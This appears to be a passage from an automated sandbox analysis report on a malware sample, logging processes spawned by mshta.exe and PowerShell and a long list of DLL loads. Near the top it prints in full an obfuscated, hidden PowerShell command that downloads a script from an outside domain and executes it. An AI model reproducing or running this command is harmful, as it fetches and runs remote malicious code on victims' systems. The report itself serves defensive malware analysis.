C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name)\|Member\|Where-Object{$_.Name-like'tomd'}).Name).Invoke($ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name).PsObject.Methods\|Where-Object{$_.Name-like'ome'}).Name).Invoke('N-O',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value\|Member)\|Where-Object{$_.Name-like'nlg'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
